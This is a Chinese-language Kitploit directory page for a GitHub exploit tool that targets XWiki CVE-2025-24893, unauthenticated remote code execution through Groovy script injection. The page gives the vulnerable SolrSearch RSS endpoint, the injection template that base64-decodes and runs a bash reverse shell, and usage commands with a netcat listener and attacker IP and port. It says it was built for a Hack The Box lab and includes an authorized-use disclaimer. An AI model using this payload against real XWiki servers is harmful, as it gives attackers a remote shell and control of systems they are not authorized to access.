Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xwiki-cve-2025-24893-exploit — 通过Groovy脚本注入实现XWiki CVE-2025-24893未认证RCE漏洞利用 | Kitploit
工具/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

通过Groovy脚本注入实现XWiki CVE-2025-24893未认证RCE漏洞利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
8个月前尚未审核

XWiki CVE-2025-24893 漏洞利用工具

针对受 CVE-2025-24893 影响的 XWiki 版本的未认证远程代码执行(RCE)漏洞利用工具。

漏洞概述

15.10.9 之前的 XWiki 版本可通过 SolrSearch RSS 订阅源处理器中的 Groovy 脚本注入,受到未认证 RCE 漏洞的影响。该漏洞之所以存在,是因为 XWiki 未能正确清理 text 参数中的用户输入,从而允许攻击者突破 RSS 上下文并注入任意 Groovy 代码。

CVE 编号: CVE-2025-24893
CVSS 评分: 9.8(严重)
受影响版本: XWiki < 15.10.9

功能特性

  • 简单的命令行界面
  • 自动生成和编码有效载荷
  • Base64 编码的反向 Shell,可绕过基本过滤器
  • 依赖极少(仅需 requests 库)

依赖要求

root@kitploit:~
pip3 install requests

用法

root@kitploit:~
python3 exploit.py <target_url> <attacker_ip> <listener_port>

示例:

root@kitploit:~
# 在攻击机上启动监听器
nc -lvnp 9001

# 运行漏洞利用脚本
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

工作原理

  1. 构造一条 bash 反向 Shell 命令
  2. 对有效载荷进行 Base64 编码
  3. 使用模板注入(}}}}}}{{{{groovy}}}})将其包装在 Groovy 代码中
  4. 对有效载荷进行 URL 编码,同时保留必要的分隔符
  5. 向 /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> 发送 GET 请求
  6. XWiki 处理恶意 RSS 订阅源并执行 Groovy 代码

概念验证(PoC)

该漏洞利用工具针对以下端点:

root@kitploit:~
/xwiki/bin/get/Main/SolrSearch?media=rss&text=

该漏洞允许突破 RSS 订阅源上下文:

root@kitploit:~
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

免责声明

此工具仅供教育和授权渗透测试使用。作者不对因使用本程序造成的任何滥用或损害负责。请仅对您拥有或已获得明确测试许可的系统使用此漏洞利用脚本。

参考链接

  • XWiki 安全公告
  • CVE-2025-24893

许可证

MIT 许可证 - 详情请参阅 LICENSE 文件

作者

为 HTB 靶机 "Editor" 而创建


注意: 在测试任何系统之前,请始终确保您已获得适当的授权。

下载工具